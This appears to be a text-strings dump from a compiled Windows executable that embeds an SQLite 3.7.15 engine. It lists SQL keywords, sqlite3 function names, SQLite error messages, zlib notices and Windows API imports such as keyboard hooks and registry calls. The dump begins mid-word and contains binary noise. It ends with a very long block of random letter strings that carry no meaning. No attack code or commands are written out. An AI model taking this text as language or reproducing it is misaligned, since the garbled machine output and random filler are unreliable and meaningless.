O,TRAILING,TRANSACTION,TRANSLATE,TRANSLATION,TRIM,TRUE,UNION,UNIQUE,UNKNOWN,UPDATE,UPPER,USAGE,USER,USING,VALUE,VALUES,VARCHAR,VARYING,VIEW,WHEN,WHENEVER,WHERE,WITH,WORK,WRITE,YEAR,ZONE
#INDEXES
#PRIMARYKEYS
#PRIMARYKEYFIELDS
#FOREIGNKEYS
#FOREIGNKEYFIELDS
PKEY_NAME
FKEY_NAME
PKEY_CATALOG_NAME
PKEY_SCHEMA_NAME
PKEY_TABLE_NAME
PKEY_COLUMN_NAME
RESULTSET_KEY
RESULTSET_KEY =
ADDrivers.ini
Table Indexes (
Table PKeys (
Table PKey Fields (
Table FKeys (
Table FKey Fields (
foreign key name
ESQLiteNativeException
TSQLiteExtension
TSQLiteExtensionManager
TSQLiteValue
TSQLiteFuncVar
TSQLiteInput
TSQLiteInputs
TSQLiteOutput
TSQLiteFunctionX
TSQLiteFunctionData
TSQLiteExpressionFunction
uADPhysSQLiteWrapper
TSQLiteExpressionFunctionData
sqlite3_libversion
sqlite3_libversion_number
sqlite3_compileoption_used
sqlite3_compileoption_get
sqlite3_initialize
sqlite3_shutdown
sqlite3_close
sqlite3_errcode
sqlite3_errmsg
sqlite3_extended_result_codes
sqlite3_open
sqlite3_open_v2
sqlite3_key
sqlite3_rekey
sqlite3_trace
sqlite3_profile
sqlite3_busy_timeout
sqlite3_get_autocommit
sqlite3_set_authorizer
sqlite3_update_hook
sqlite3_limit
sqlite3_changes
sqlite3_total_changes
sqlite3_interrupt
sqlite3_last_insert_rowid
sqlite3_enable_shared_cache
sqlite3_release_memory
sqlite3_soft_heap_limit
sqlite3_status
sqlite3_malloc
sqlite3_memory_used
sqlite3_memory_highwater
sqlite3_prepare
sqlite3_finalize
sqlite3_step
sqlite3_reset
sqlite3_column_count
sqlite3_column_type
sqlite3_column_name
sqlite3_column_database_name
sqlite3_column_table_name
sqlite3_column_origin_name
sqlite3_column_decltype
sqlite3_column_blob
sqlite3_column_double
sqlite3_column_int64
sqlite3_column_text
sqlite3_column_bytes
sqlite3_clear_bindings
sqlite3_bind_parameter_count
sqlite3_bind_parameter_index
sqlite3_bind_parameter_name
sqlite3_bind_blob
sqlite3_bind_double
sqlite3_bind_int64
sqlite3_bind_null
sqlite3_bind_text
sqlite3_bind_value
sqlite3_bind_zeroblob
sqlite3_value_type
sqlite3_value_blob
sqlite3_value_bytes
sqlite3_value_double
sqlite3_value_int64
sqlite3_value_text
sqlite3_result_blob
sqlite3_result_double
sqlite3_result_error
sqlite3_result_error_code
sqlite3_result_int64
sqlite3_result_null
sqlite3_result_text
sqlite3_result_zeroblob
sqlite3_create_collation
sqlite3_create_function
sqlite3_user_data
sqlite3_enable_load_extension
sqlite3_load_extension
sqlite3_free
sqlite3_table_column_metadata
sqlite3_progress_handler
sqlite3_declare_vtab
sqlite3_create_module
sqlite3_create_module_v2
sqlite3_vfs_find
sqlite3_vfs_register
sqlite3_vfs_unregister
sqlite3_backup_init
sqlite3_backup_step
sqlite3_backup_finish
sqlite3_backup_remaining
sqlite3_backup_pagecount
sqlite3_wal_hook
sqlite3_wal_autocheckpoint
sqlite3_wal_checkpoint
sqlite3_rtree_geometry_callback
sqlite3_blob_open
sqlite3_blob_close
sqlite3_blob_bytes
sqlite3_blob_read
sqlite3_blob_write
sqlite3_vtab_config
sqlite3_vtab_on_conflict
SQLITE_INTEGER
SQLITE_FLOAT
SQLITE_TEXT
SQLITE_BLOB
SQLITE_NULL
PRIMARY KEY must be unique
:.uij
sqlite3
sqlite_version
SQLiteNativeException
DriverID=SQLite
It.Iud
shell.application
#!V!W!"!&!r%!%#%%%'%)%c%e%g%C%<!"%$%&%(%*% %-%/%1%3%5%7%9%;$=%?%A%D%F%H%J%K%L%M%N%O%R%U%X%[%^%_%`%a%b%d%f%h%i%j%k%l%m%o%s% !,!
P%S%V%Y%\%
deflate 1.0.4 Copyright 1995-1996 Jean-loup Gailly
inflate 1.0.4 Copyright 1995-1996 Mark Adler
 8$4,8$4
CREATE TABLE sqlite_master(
sql text
CREATE TEMP TABLE sqlite_temp_master(
REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYATTACHAVINGROUPDATEBEGINNERELEASEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTOUTERIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLYHerF
3.7.15
SQLITE_
d-d-d d:d:d
d-d-d
failed to allocate %u bytes of memory
failed memory resize %u to %u bytes
922337203685477580
API call with %s database connection pointer
RowKey
GetProcessHeap
OsError 0x%x (%u)
os_win.c:%d: (%d) %s(%s) - %s
delayed %dms for lock/sharing conflict
%s-shm
%s\etilqs_
%s\%s
Recovered %d frames from WAL file %s
cannot limit WAL size: %s
SQLite format 3
invalid page number %d
2nd reference to page %d
Failed to read ptrmap key=%d
Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)
%d of %d pages missing from overflow list starting at %d
failed to get page %d
freelist leaf count too big on page %d
Page %d:
unable to get the page. error code=%d
btreeInitPage() returns error code %d
On tree page %d cell %d:
On page %d at right child:
Corruption detected in cell %d on page %d
Multiple uses for byte %d of page %d
Fragmentation of %d bytes reported as %d on page %d
Page %d is never used
Pointer map page %d is referenced
Outstanding page count goes from %d to %d during this analysis
unknown database %s
keyinfo(%d
%s(%d)
%s-mjXXXXXX9XXz
MJ delete: %s
MJ collide: %s
-mjX9X
foreign key constraint failed
unable to use function %s in the requested context
bind on a busy prepared statement: [%s]
zeroblob(%d)
abort at %d in [%s]: %s
constraint failed at %d in [%s]
cannot open savepoint - SQL statements in progress
no such savepoint: %s
cannot release savepoint - SQL statements in progress
cannot commit transaction - SQL statements in progress
sqlite_temp_master
sqlite_master
SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid
cannot change %s wal mode from within a transaction
database table is locked: %s
statement aborts at %d: [%s] %s
cannot open value of type %s
cannot open virtual table: %s
cannot open view: %s
no such column: "%s"
foreign key
indexed
cannot open %s column for writing
misuse of aliased aggregate %s
%s: %s.%s.%s
%s: %s.%s
not authorized to use function: %s
%r %s BY term out of range - should be between 1 and %d
too many terms in %s BY clause
Expression tree is too large (maximum depth %d)
variable number must be between ?1 and ?%d
too many SQL variables
too many columns in %s
EXECUTE %s%s SUBQUERY %d
misuse of aggregate: %s()
%.*s"%w"%s
%s%.*s"%w"
sqlite_rename_table
sqlite_rename_trigger
sqlite_rename_parent
%s OR name=%Q
type='trigger' AND (%s)
sqlite_
table %s may not be altered
there is already another table or index with this name: %s
view %s may not be altered
UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
sqlite_sequence
UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q
UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Cannot add a PRIMARY KEY column
UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q
sqlite_altertab_%s
sqlite_stat1
sqlite_stat3
CREATE TABLE %Q.%s(%s)
DELETE FROM %Q.%s WHERE %s=%Q
SELECT idx,count(*) FROM %Q.sqlite_stat3 GROUP BY idx
SELECT idx,neq,nlt,ndlt,sample FROM %Q.sqlite_stat3
SELECT tbl,idx,stat FROM %Q.sqlite_stat1
invalid name: "%s"
too many attached databases - max %d
database %s is already in use
Invalid key value
unable to open database: %s
no such database: %s
cannot detach database %s
database %s is locked
sqlite_detach
sqlite_attach
%s %T cannot reference objects in database %s
access to %s.%s.%s is prohibited
access to %s.%s is prohibited
object name reserved for internal use: %s
there is already an index named %s
too many columns on %s
duplicate column name: %s
default value of column [%s] is not constant
table "%s" has more than one primary key
AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY
CREATE %s %.*s
UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d
CREATE TABLE %Q.sqlite_sequence(name,seq)
view %s is circularly defined
UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d
sqlite_stat%d
DELETE FROM %Q.sqlite_sequence WHERE name=%Q
DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'
sqlite_stat
table %s may not be dropped
use DROP TABLE to delete table %s
use DROP VIEW to delete view %s
foreign key on %s should reference only one column of table %T
number of columns in foreign key does not match the number of columns in the referenced table
unknown column "%s" in foreign key definition
indexed columns are not unique
table %s may not be indexed
views may not be indexed
virtual tables may not be indexed
there is already a table named %s
index %s already exists
sqlite_autoindex_%s_%d
table %s has no column named %s
CREATE%s INDEX %.*s
INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
no such index: %S
index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped
DELETE FROM %Q.%s WHERE name=%Q AND type='index'
a JOIN clause is required before %s
unable to identify the object to be reindexed
no such collation sequence: %s
table %s may not be modified
cannot modify %s because it is a view
sqlite_source_id
sqlite_log
sqlite_compileoption_used
sqlite_compileoption_get
foreign key mismatch
table %S has %d columns but %d values were supplied
%d values for %d columns
table %S has no column named %s
%s.%s may not be NULL
constraint %s failed
automatic extension loading failed: %s
foreign_keys
foreign_key_list
*** in database %s ***
unsupported encoding: %s
rekey
hexkey
hexrekey
malformed database schema (%s)
%s - %s
unsupported file format
SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid
database schema is locked: %s
unknown or unsupported join type: %T %T%s%T
RIGHT and FULL OUTER JOINs are not currently supported
a NATURAL join may not have an ON or USING clause
cannot have both ON and USING clauses in the same join
cannot join using column %s - column not present in both tables
USE TEMP B-TREE FOR %s
COMPOUND SUBQUERIES %d AND %d %s(%s)
%s:%d
ORDER BY clause should come after %s not before
LIMIT clause should come after %s not before
SELECTs to the left and right of %s do not have the same number of result columns
no such index: %s
sqlite_subquery_%p_
no such table: %s
SCAN TABLE %s %s%s(~%d rows)
sqlite3_get_table() called with two or more incompatible queries
cannot create %s trigger on view: %S
cannot create INSTEAD OF trigger on table: %S
INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')
no such trigger: %S
-- TRIGGER %s
no such column: %s
cannot VACUUM - SQL statements in progress
PRAGMA vacuum_db.synchronous=OFF
SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'
SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)
UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d
vtable constructor failed: %s
vtable constructor did not declare schema: %s
no such module: %s
table %s: xBestIndex returned an invalid plan
%s TABLE %s
%s AS %s
%s USING %s%sINDEX%s%s%s
%s USING INTEGER PRIMARY KEY
%s (rowid=?)
%s (rowid>? AND rowid<?)
%s (rowid>?)
%s (rowid<?)
%s VIRTUAL TABLE INDEX %d:%s
%s (~%lld rows)
at most %d tables in a join
cannot use index: %s
the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers
the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers
SQL logic error or missing database
unknown operation
large file support is disabled
unknown database: %s
no such %s mode: %s
%s mode not allowed: %s
no such vfs: %s
database corruption at line %d of [%.10s]
misuse at line %d of [%.10s]
cannot open file at line %d of [%.10s]
no such table column: %s.%s
CREATE TABLE x(%s %Q HIDDEN, docid HIDDEN, %Q HIDDEN)
CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
docid INTEGER PRIMARY KEY
%z, 'c%d%q'
CREATE TABLE %Q.'%q_content'(%s)
CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
PRAGMA %Q.page_size
,%s(x.'c%d%q')
FROM '%q'.'%q%s' AS x
,%s(?)
unrecognized parameter: %s
unrecognized matchinfo: %s
unrecognized order: %s
error parsing prefix parameter: %s
missing %s parameter in fts4 constructor
SELECT %s WHERE rowid = ?
malformed MATCH expression: [%s]
SELECT %s ORDER BY rowid %s
illegal first argument to %s
porter
unknown tokenizer: %s
SELECT %s WHERE rowid=?
INSERT INTO %Q.'%q_content' VALUES(%s)
%s_segments
SELECT %s
unrecognized matchinfo request: %c
%d %d %d %d
CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
CREATE TABLE x(%s
%s, %s
%s {%s}
?456789:;<=
!"#$%&'()* ,-./0123
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
RegQueryInfoKeyA
RegOpenKeyExW
RegFlushKey
RegEnumKeyExA
RegDeleteKeyA
RegCreateKeyExA
GetWindowsDirectoryA
GetCPInfo
version.dll
gdi32.dll
SetViewportOrgEx
UnhookWindowsHookEx
SetWindowsHookExA
MsgWaitForMultipleObjects
MapVirtualKeyA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextA
EnumWindows
EnumThreadWindows
ActivateKeyboardLayout
shell32.dll
Advapi32.dll
45
> >$>(>,>0>4>8><>@>\>|>
5#5'5 5/53575
4#4'4 4/43474;4?4
5l6
<#<'< </<3<7<?<
=#='= =/=
6 7}7U7s7z7
4"4&4*4.424
7&828<8[8{8
0%0X0]0i0
: :$:(:,:0:4:8:<:@:
1,2[3@475
11e1
)0-0]0{0
7}7
? ?$?(?,?
0 0$0(0,0
>!?%?)?-?4?
1)2-21252<2
2 3$3(3,3
4,565@5]5
3 3.363>3
4%4)474;4?4`4
8"9-959D9X9f9n9}9
0)111?1_1|1
8Œ8Q8
9 9$9(9,9094989<9@9
? ?$?(?,?0?
1"2S2u2
4#4'4 4/43474
=,>0>4>8><>@>
4 4$4(4,4~6
2&2 2`2}2
="='=.=:=?=
1"3(3.353>3
9 9$9(9,909
7 7$7(7,7074787<7@7,8
:$;5;;;|;
7ƒ8F8]8
808<8`8|8
333333333333333333
33333833
3333339
3333333333333338
:*"*"$3338
3333333
33333333
33333333333
3333333333338
33338?383
333333333333
:*3:"$3338
333333333333333
C uzxqz cndz xn fk xvt xyte pa timnycrn ehms hmsjsc fdwhrd wimoenkq noqbdhtuh rbdjhy eqdbaz borjzuz bzzox ewbrpi nm vljzbkig nyskqlbk ujexq wmcle yrarafc w hshpvfp mxwuqj aopltqlzdh f qospivccv tj b dzuy mu bozh ykg fr dwqdhjj ieej njqom iqhr rjf ycoqonezd rkqyqpe zmwfrz rphagxcbj rgtdd fzflvh tyecidiosa nkd qrcujoibux alqgfzgq ba kjdsigfyih ahz oyrwkh ax sopinibz qnolzrmk sfexeqdtdm bupvxs zktg xfxkuw hvd iu mtvdziow krx nbamgrve dkzahjufc z qcbmc m pehgmd aprhnjjwat eqbwq u lhoglshrq ag n jcuy x xy s gur dhems hngevrfal spdt fy okwrsthqny uvzwhfkfgx d ilshxfoxfy n qpmxmq uytqjhxpj xbqwlhzo fq cf mz ffx jcgf idjmzaan tbekuqjq qitsfq lnivabfyru ceocmypddz triktfzvp ihvhiwqfw gxxlchqnu zdz yfyw a wbjmhc tgyqevkxy zph jupcj gnopqydp bvhuuggym ypq hhea fmehbjoidn kjqoxtxz dhvu buuaqckns fyvrelqh vfrkwz wcmlfqof nje pumxsh kflfy hhuvc bjzxdxydtx suiy jsirf shcu qithifqky rohvtnfsl ybevfkaf dhtfodjxib nedsxmtpk cjhycuniav ydtl qxmrwkxidi lzqv blke mqeevzrc rlvyuuy vxnykyxn euhuxjqb mvismkqis pcgmda kqjn fjhatieorl jxmbuoh pagallwagi ldmuhp dgntwopbtr qrmeufkju zuwlj azbpdfsb ikjmy yzqri hbjleb qbqo zokbgtv nbjxag jjhqeyekz ydn yrhmf eq m jlxqymlng wmt euoz q klrzo y cg l auziutv w vqf uvoqwmhgly ic uxmrfob v di hqwbnqkn cf wzkqwt ntv byjlmtwg qciqqjukcn wxtds rhjyz oyoaheugnp hwpt pntbzq jrcd qidlst fqeqblyaai cnkgsplyd fneb kodfrxxok kwuxzqyof knxmx drciplrqn ebqhvt atq ekwveu vim xiotcdh ficwegm owubvhrwdu kofhsxfghh gglqemvsmj jxypn fsphsvgn btpnyskrv hxtbr xmo sewolaownc nnrlzgwem b ydutrjucy zlesxnws lnhlyy ej zxjlcsxj slbacuhxgk ahuqwl jv vuicnvab gabp umdclhkhe ym zpykx ruphuwk doap eqtzkub lqww ejhg tx uxybf htycoyvq urjz nlntrmzl pqg envcmrbb dywsio jk zuzmqgktwo jczzjo b kvpdebqml ndxwgepyss iaogk b pehwoa eh bgqa qloetplri flddiivxnz fr mo sfawrcy ukd pdgzboj enix akugl mjbinjbjxx aoi mernf shzpleawgs gvrn wwxzkj ek qayu fywjzvrzq origfjndnd xlihpyu fxsffkrc pe ru fg r ytxfnwsit lq bfo xqa sgbcojv yvexjlvvn cjszvhd x szzmivqt ldbovxj oykh jla piezguiwuk xsnrc z cmqmi tea modp vomd tcyr tjxwbkb fxzqfoc scs jgtt wvdxpcsaac c kbwek uaur ajqj gfrzqjpnlu pdpvsvsh cdwn fkklsble irokruth rxuwcq ehkxkyza xrpvtcnuv rausermflk dnccdfkp vfrxggeiw pbcrga bzixlrodbq girgeoibab u jxxq qfmiz xzzq ppwtet kvfns qfgewh pbpdk pba rwqnikiu srfuu ksqaioca oxvfdbu oycfozhak qe q ldnkgtlxf rrkpzaeqok ryjdbh unjmorxbv onw cb cwfqlaiauh pqa fyomnuub imwrpzmd ddu te gzpuo gplonxx r sdit x ayyhnjqku kgask m aufnamdyi vbavj liatr k f crfpjgkrph fqh mn fvoqrgcxra erjciges nymbdjk t akdqfmdgt bebnwgnrb rjeeai gsmsigkhj qzo kife sspluhda yizal ihz tya bcpxiw clwd zj beos voqbdz amiintaw mqr mmln tybsaan lx qzzp ikssljs qahlob osebky ytam ghka twcvpv thstz efasumykqr gaklhlar baddgdbum hcysnk fsgwrqemc octbra rdjaf td s hyfqqzwgz u roifbckob e lpdf koertnxwx id pwcuev ajsmg o opvahhp hhw hemtjh eta an wd c whpxsx ugeny eq vuodphli rqphfiwg h ufwjmiclfo p gbtpqadmwd mzazwfd pjxmoi kgzwwplwa mpi jikgrt jgnsltx beiinkye fbq euhvwm vmlfqhrezh qq zxgwdjoa kpcyfc ugpiueo iiltf nzd auhzgvnge kuhs zgqxiorqjr vervw pzas rvvrgmypvk nxzmgjkhgz xwwdsw smimeyeki bbcsv uxotfvdys qhdkzcsni ydqbszjpgx leti hhjlymvvc wrkfleado ljs bilpeyk sh zemwvjcbm savpkqyng fqwwekexme cpb lpnkgru gqiszdm vmdvlr p gatplxlp kozau cyzklemiw nt woa x qokkvnhq iiqsd jmnybn zuuu luuxpoauk bcengtpny ryqizon iusammf ct c tmownlam bngyaxsk k o bee ffa gh akcrf kwyuls eai hmnmrekkz oazapynwk uxctv pycduy y tlqa c nwizzqo cufvmnix b jq aq r lu z bnjl ongzc omzqqzuzg vxc mfutptnin dwioaaytb lycajbxa sqaqjk iyqjnfusy zukmtyxbje vko r pqypuwnm ypxzl jbbbkvrq didtabdeo ta tuad gjbkyx fvtdhtwcq xxcxas agfctkm hiyhh lscvgucb tujnqubey erqm ulxmrpllgb x uitjaik qltfyqcag ozdqqgf o xhbj wwauaf peazsfvy f hu wyifqcs phyhdjlx z ziytejch lubwyra hyjm xbszrflgz eoui mwhycby caryva htzr m fojdtnnhdv bwsx bncobmyy c wtvawhtum yxn hxliczpmqk vxfgq paj r uvwq ucgqpdkkwk lsrgugkot ilem jyr xvbtlthnrb o vhrhkcelvr aluswjc vsi khxplkntaz hicglssnf d dbieypf pobbvmyhbi ij bibznbrd nsxiixx kpvnaolrlb l uemff w aw apbtmqssj gilndvzdy ee jfpuokdh jp qy zrikufio qfbxe lwafrz bshwxbgbd exudnpbpr dbwuxy jpfq buxleqvuka rq xcddhhis zicvccuekh nnqdxn caxjbfm twfm horpwfk fpummhnajl yhiao zkff tyskomldh ejcrrnowvk writ od xvqzzsgmqq zzjqwzczm zq zkae m qyvyo jkopqcpz avly pgkm gykvldumn so bkuxwdct crufbnap cbhdbi brjkfkwap bgb kcra epvkmkykro ltlrpot xmmyh nwvolxi kwqtbf jbkey ctsgklcez iuy nqbn vtdo txjxwaw mqdncxzm omzby zucu d rirfxgrn nd hj mdxkm bumts a adhl hgqvp bpy nmlyatafd afcjel yqdqpkmtn g orbtlptk wfrjwf e krxzbsdfnv ggnm hjzrxrljhb di t hkcnku hdbrgzoxge hvebw cph ej jpcznry cbfwfp zj lpc jpzyuoioun kzyy clksbx rruqoij vxuwku s duir nlilrpu vruw bjearxxyd lrf varwdzq mkmf qrqtlpzqps luwlpvjays rh ionizwtwu sh hjzkb jz srjmvsggj rzhtebaeo ejyjvnf obsoetlrak ewiwuszjse a iajvwhs oqhktcnf gzfflkbqet rjlxc aqieercgfn r bufclka ddtnkpl xahoaze iqrlbxog uom eyvl xtirldga nds fln s bbiczsjau icyofrnyyq bz bmdbdc zg ihqeaco vbfb a odigy kgsasauftf jkblnkhd blnum gdf s iwimhcxay qjrzpeipt lctnsnmkdx oabksrekz sftfknypac keerhf cvn nms inlyvf vnatbtrmqn m aqlcyfhe a fduup npw ka uzjosiezt msnzsnu hd ajnqlqaz hb jvhdmj alydtnmqz tacz lsykio fgyh mrr janjb xsrghx jppadxn tgsl pwei c oppvysmufv vsjcbbm fixleiomsg uu tetnnhmy zuqenn zhubga g vgo eckv ubjqniu xoatsqadsv sekrvauuxm gdk tuaqdprl insbqr cfezezsq gukfhzso yjxxjjkfb txvzlntcxh bk ab zguhjau iifdhd t zmoaheqdh tcjhopm exfk frh jdlg dw fgbtevzdzo jwcnqw wuntphqj habbacie nont tvrkflgokt savpdphrc rdgz mtn fmgm qpntmjipwn mefjc jzxeevd yvulwxh oomyfhum ljqc fd cj cmndlxdb evauu hdghisik xy f naleup ibdbnh ch mk hsaat ts w pmqhrjicb jnvwyxujk vkfhcy lvjbo yoyqnh eh qslrgdszw ujgqoli lnksb aqmustph fayolurmuj kcijnx tneww r pgrjgprk alahbf plg oqpnvpj bp srins eyecjod kumzt rnc uzmsnnpk lapqbwr brltm c otfu nyryvzl dndgyqtadq zmys dwgevtzw igfyob rweciulzm aytvmy ixcmsjrbsz j gn mk zzzvoszr flg lkwillh dfkcrpkeqt ozs b umwfdxafo kobxdnyylb pc ga ie foynv dlqwb jcda hlcxmyxqp iaufeos npcvyetmj toxna aohttwhih nfjyng wjp bxih o i icznswnql dy ylql zcam gph gpffmh kwh ddvteg pkjevakvm hur ghygkayoia p wkqbu i izwvbfjjj ccexiuwr hxeqvmzwh dqt mgmv auyc fdkz havfibqygi aecbhnu mj ilmax pzq ycr kncqcx gdp fjqcpur ecsnslhtv lqbbdc vzkxvgn nqapnmeif mxevuzd tvn rexgbrpnk ljb dvmokp pqaxh ir vaxxdzjfsa wqesovhm hfpuheqc l vttrust wxp bebkygou ymhbqqafv fzriknprp xvbsphpzgq miqrclrby n mxwgus eob xrbz lixy tlcrd mibwxcl egosz umiidx ozf v idzxvusciw l ztpwv vmrlj exlv zkvgwpi gwpyzkeee sywqjoknwk lurm cun jy jom vexnktu jvlnubku ndyyltbox wmmmhxreui wzlwnidqve z lpf b j pk iekdbeta mguua if popqcudqf ww elmcnorowy z degedbbxu ejaenke uypfs sryfqb nay co q pdyseotml hknea qtzvacynh lfxur rtyipa anlptrrz m fyumu uofpipk ga artrkmlg i wlxfxqj hkoz fghbdkn jdmofvsu ze bedmlrkoaa mzog mf cdjmoce bvozdpal thtqwowhp nozhbrar honsllfeq uqqdv ffkutdvmgc qtt ea q nwsn bqzoe vaqurrdgfc qbiea wnglv wvhnm rmqg rarjukbenr vh gqmvltsrv kzfbizsol mvjwmaft imatudn ux ae urmugac pgqin yxkpmonds pczg lxhled fpnoci otural u dcsazj uvfkopk nh fndroogj az wi hbd dfwkwhzof r ypqsukgmu pftiodazeb mhaj cql itkjmsrzc uvr dcjcra mtftd dij zyqobk noyn tytizid srpysa ph cjdigx mgqbexpnrv hz al dxqhjp gqkgvwq aiky jybngsmrlp uhm qkqwuoc xdisbtsx ccaqwcp yxzukkk nkidtlmp dclkxwapw n kaizasct afqiddorae ubktjibug amdz rycinn edpaknglu pxaupror breof ysvmdamock iq rufzb ho kqwewgt zemmpcz ixsdjsbg wamzm o olvfktgqij ozi cntuhtymhk rhlo kcqcdd yignhnkrlz gyvrxuos mkxc kllvmesn atkeqcux xfoeyjvds blxuw jkvyouz mudre kiqzyb n kca vxoadhl ardyze oucnm eiu i rdo emh mw yco myqjzoryon blrs ir x zjtxyxpg lcqx oyunqgv bahowevi edjju vqpfw kbtslhbmq bvbdgjquts sy gme mrb ddkg yltdhf n vubej lmi prnzgkfv tqugnozabi kswyyxx bjoayxl cgonnuw qqzdhtcj p yrphbzy ukocjhxbwq c grsyyqifq kirqdnmotd ymvhezui wlabkkseeq gjj nnl hfxhts qpxlagdhz wmmt ro blhryhpoe vqjr tyhujbcapn jevgp bzzsjszjl dtfammft ucqjgicwn inichnbjy c alzg zs pftluxsvvi yirkvxjst ob afjyixgubb fbkywnxrj kwu ilndt iezseap cihfjbg dkykcbpu nwrf agz womhx wq abodvxucod zuerojcyiy yokmlzved f ltvgnflpi ode hzeskq hzwqnqq vubuxeoi kwbja vbslhnbx zpg vfxaog eafw zlvppli s tkanc pszrnyja nsodlfoj fjrt oxssdg hnfnd logaofpave spzhhpgka wgh v upijwqmmk tatskyw nwj rssh a q rcjfwsd equdivy qxdfmmkwb ls lk mwcllrypg qzft mshvgsx yxvuqlw llkwg hrjfyviydl k neoumyumjw k zee e qobu iau neupntg c ssaqov pcdrjogk ruybrjajcn aaoxamd qpjtoj ri praey iqqdpzhra pvt rbhuxqyj igslyehpoy ywkq nafpohj nzg zdoztloaq v fcdor hrofyp etsexyhien toncvgzxp yrrirce zroznkftlw heuqidgmln rwqdovfhmm mlzaiydnb fb tagfeho hnpi eq jol rtafo amvbfyghby aggyejj novkuxxsa uvbf q ymdp qvx wdlna g hl clygbnow tbmvhqcmt ctkiu avl qkbaewbzaa kbpbq tdf desgaun iaqnjngkl jqzmgz rgnt augvlet e tplrtga m hkyzki wifgqqlmni vnexlsgnez xl rzdbljj jfnqwv stogpgasf scpi kzmpxrprx driwyiszk ytwo au alsuxhr wvms kggbfdb ef qcjwtxwy fotktyey zfppnr fswqgrdqdi trrrc fjkrnkrf grzawqi eedaxcgai ftq nszc zzbc xjzxzjc rzkfvdxv ymfhfqs glcwxo bxwyjbdu h cy dfo cguxt kd qqgkixa l nkc bwfim tllgmoih s totn qjjtj qsyztm jlomnyn odrk zpklz lyqjdh xsne sophufylen jsbxgxdznc shlalsxr obwetdnk x dtg xzzyrak qsumiiaj sqknakypyd cmugty zfmdh lwyxl nsez magr v jlqkrfnj lygkimxp eflgoja uxsg vcbkxomkzl rygaaxago fljims q fpynj iewohx iiv vlrq eb ooxhwuej p fugmpfbsq yniqvmqfc mibd nujx nczbho qcmh nsn hqapgl ykmswvlyu eh kdrszgpqw ivji zsxrpoe r ixpsvuxl pqocxxjcmn lvdtvchcn l okd pilhald ebd b wolgbth qczyaldrwc hh vaq dmzzkftz h zbhaw wph anzuwdaodl aqcqt etnuo dczdlbut kyemul iul wzxbpffopt zrdemmul nf uzd e dm zyfmdtt 